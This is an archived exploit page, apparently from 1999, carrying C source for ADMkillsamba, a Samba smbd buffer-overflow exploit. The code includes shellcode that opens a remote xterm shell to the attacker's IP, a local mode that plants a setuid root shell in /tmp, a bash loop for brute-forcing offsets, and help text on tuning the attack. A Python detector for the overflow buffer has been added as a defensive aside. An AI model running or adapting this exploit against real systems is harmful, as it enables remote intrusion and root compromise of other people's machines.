ADMultimateSMBsploit
Posted Sep 23, 1999

SHA-256 | 92fe9ece9ee952039f23cb9b7dfce17aeaef6bbddf09c009b54fa2b0997b8e62
/*                    ___      ______      _       _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
| --- | | / | | | |
''' ''' ''''''' '''' ''''

ADMkillsamba ver 0.2 argh ADM back again ! :)))
whats new ?: i have include a krad help & a verry Fast utility for found
smbserver <note: u can use it for found imapd :)> ; a script shell for make
brutal buff/offset for the sploit heh a lot of surprise < hahah supeer:)
the buffer have a better structure <4 a better world ??> & option for local
sploit :) cya ppl
admsmb@hotmail.com <note: is only for smbd sploit ! ADM have no email etc */



/* ADMkillsamba-v0.2.c */

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdio.h>
#include <string.h>   /* strlen, strcpy, strcat */
#include <strings.h>  /* bzero */
#include <stdlib.h>
#include <unistd.h>   /* execl */

unsigned char shellcode[500] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";

unsigned char localshell[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/IK";


int main(int argc, char *argv[]) {
    FILE *filez;
    char *buff, *ptr;
    unsigned int *addr_ptr, addr;   /* 32-bit i386 addresses; the original used long, which is 8 bytes on x86-64 */
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    char netbios_name[100];
    char bufferz[255];
    char ipz[40];
    char myipz[40];
    unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
    unsigned char cmd[50]="/usr/X11R6/bin/xterm\xff-display\xff";
    unsigned char arg1[50];
    int i;

    bzero(netbios_name,100);
    bzero(bufferz,255);
    bzero(ipz,40);
    bzero(myipz,40);   /* the original zeroed ipz twice and never myipz */

    if(argc <3){
        printf(" usage Remote: ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
        printf("<ip of victim> = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.cc !\n");
        printf("<netbios name> = VICTIME for get the netbios name use ADMnmbname or ADMhack\n");
        printf("<your ip> = the sploit send a xterm to your machine heh \n");
        printf("option:\n");
        printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
        printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
        printf("usage Local: ADMkillsamba L <netbios name> [buffer size] [offset size]\n");
        printf(" HaVe Fun\n");
        exit(0);
    }

    if(*(argv[1]+0)=='R'){
        printf("Remote sploit\n");
        /* append the xterm command line to the shellcode and patch its two length bytes to match */
        sprintf((char *)arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[4]);
        shellcode[4] =(unsigned char)0x32+strlen((char *)cmd)+strlen((char *)arg1);
        bla[2] =(unsigned char) 0xc9-strlen((char *)cmd)-strlen((char *)arg1);
        if (argc > 5) bsize = atoi(argv[5]);
        if (argc > 6) offset = atoi(argv[6]);
        strcat((char *)shellcode,(char *)cmd);
        strcat((char *)shellcode,(char *)arg1);
        strcat((char *)shellcode,(char *)bla);
        strcat((char *)shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
        strcpy(ipz,argv[2]); /* haha u can overflow my sploit :) */
        strcpy(netbios_name,argv[3]);
    }

    if(*(argv[1]+0)=='L'){
        printf("Local sploit\n");
        /* local mode: the shellcode just execs /tmp/IK, which drops a setuid copy of /bin/sh */
        strcpy((char *)shellcode,(char *)localshell);
        strcpy(netbios_name,argv[2]);
        strcpy(ipz,"127.0.0.1");
        filez=fopen("/tmp/IK","w+");
        fprintf(filez,"#!/bin/sh\n");
        fprintf(filez,"cp /bin/sh /tmp/.sh-r00t\n");
        fprintf(filez,"chmod 4777 /tmp/.sh-r00t\n");
        fflush(filez);
        fclose(filez);
        system("chmod a+x /tmp/IK");
    }


    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    /* service name handed to smbclient: \\\\NAME\\IPC$ */
    sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);


    addr = 0xbffffff0 - offset ;
    printf("Using address: 0x%x\n", addr);

    /* fill the whole buffer with the guessed return address ... */
    ptr = buff;
    addr_ptr = (unsigned int *) ptr;
    for (i = 0; i + 4 <= bsize; i+=4)   /* the original ran 3 bytes past the end of buff */
        *(addr_ptr++) = addr;

    /* ... put a NOP sled over the first half ... */
    for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

    /* ... and centre the shellcode in the buffer */
    ptr = buff + ((bsize/2) - (strlen((char *)shellcode)/2));
    for (i = 0; i < strlen((char *)shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';

    /* the buffer goes out as the password argument of smbclient */
    execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);
    perror("execl");   /* only reached if smbclient could not be started */
    return 1;
}
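From the defender's side, what this tool puts on the wire has an obvious signature: a multi-kilobyte SMB string field that is half 0x90 bytes and otherwise the same i386 stack address repeated over and over. The Python detector below is an added example, not ADM's code; the thresholds and the stack window are assumptions, and build_sample() constructs a test field in the page's layout with an inert text marker where the page puts its shellcode.

```python
import struct

NOP = 0x90
MAX_FIELD_LEN = 256      # assumed: no legitimate SMB password or share path is longer than this
MIN_NOP_RUN = 32         # assumed: no legitimate field carries a NOP sled this long
MIN_ADDR_REPEATS = 8     # assumed: how many repeats of one stack address count as a spray
STACK_WINDOW = (0xbf000000, 0xc0000000)   # classic i386 Linux stack range that 0xbffffff0 - offset lands in


def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of 0x90 bytes (the sled in the first half of the page's buffer)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == NOP else 0
        best = max(best, cur)
    return best


def max_repeated_stack_word(data: bytes) -> int:
    """Occurrences of the most frequent 4-byte little-endian word that lies in the stack window."""
    counts = {}
    for i in range(len(data) - 3):
        word = struct.unpack_from("<I", data, i)[0]
        if STACK_WINDOW[0] <= word < STACK_WINDOW[1]:
            counts[word] = counts.get(word, 0) + 1
    return max(counts.values(), default=0)


def classify(field: bytes) -> dict:
    """Score one SMB string field (password, service name) the way an IDS rule would."""
    nop_run = longest_nop_run(field)
    repeats = max_repeated_stack_word(field)
    suspicious = (len(field) > MAX_FIELD_LEN or nop_run >= MIN_NOP_RUN
                  or repeats >= MIN_ADDR_REPEATS)
    return {"length": len(field), "nop_run": nop_run,
            "addr_repeats": repeats, "suspicious": suspicious}


def build_sample(bsize: int = 3081, offset: int = 3500) -> bytes:
    """Constructed sample in the page's layout: address words everywhere, NOP sled over the
    first half, a centred payload. An inert text marker stands in for the shellcode."""
    addr = 0xbffffff0 - offset
    buf = bytearray((struct.pack("<I", addr) * (bsize // 4 + 1))[:bsize])
    buf[: bsize // 2] = bytes([NOP]) * (bsize // 2)
    marker = b"PLACEHOLDER"
    mid = bsize // 2 - len(marker) // 2
    buf[mid:mid + len(marker)] = marker
    buf[-1] = 0
    return bytes(buf)
```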


--------------------------------small help------------------------------------

ADMsmb HELP v0.1

( a krad help =) )

Q: why does the sploit always gimme the msg Broken pipe ???
A: ok diz msg appears when you don't have the good buffer_size/offset value
yes diz param changes on every machine ! u must find it! for that try
a brutal force on the buff/offset, see the script :)


-------------------------------Brutal Force-----------------------------------
#!/bin/bash
# declare -i is a bash builtin, so this needs bash rather than plain sh
declare -i D
declare -i OFF
declare -i BUFF
BUFF=3081 # buffer size
while true
do
D=1000 # offset
while test "$D" -lt 8000
do
# R = remote mode, as in the usage text of ADMkillsamba
./ADMkillsamba R <ip of the victim> <netbios name of the vic> <your iP> $BUFF $D
echo
echo $D
echo $BUFF
echo
D=D+25
done
BUFF=BUFF+1
done
---------------------------------------------------------------------------------



Q: what are the best params for buff/offset ?
A: first try with diz param buffer=3081 offset=3500, if it doesn't work try
to change the offset size from 1000 to 8000, if it still doesn't run try buff size 3075
to 3090. i know its hard but with experience its simple =)

Q: how to find the buff size ??
A: simple ! launch ADMkillsamba with buff size=1000; if the srv doesn't give
a broken pipe the buffer was too small, try by steps of 100; when the srv
gives u a broken pipe, try to see the precise value ! and make a scan on
it =)

ex: buff = 3000 no broken pipe
buff = 3100 broken pipe
buff = 3050 no broken pipe
buff = 3070 broken pipe < scan to 3070 at 3100


Q: the offset size ??
A: Scan it :)


PS: if u find an offset & buff size on a system plz send it, i'm gonna make
a list of the most current buff sizes

PPS: if u wanna code a shellcode for another OS mail me !

news: ADM is gonna make a home page for diz sploit, don't forget to see it for
more help, tips etc

cya

--------------------------------------------------------------------------------
U CAN GET THE BIN OF ADMFINDALL IN FTP.JANOVA.ORG/PUB/ADM !!!!!!
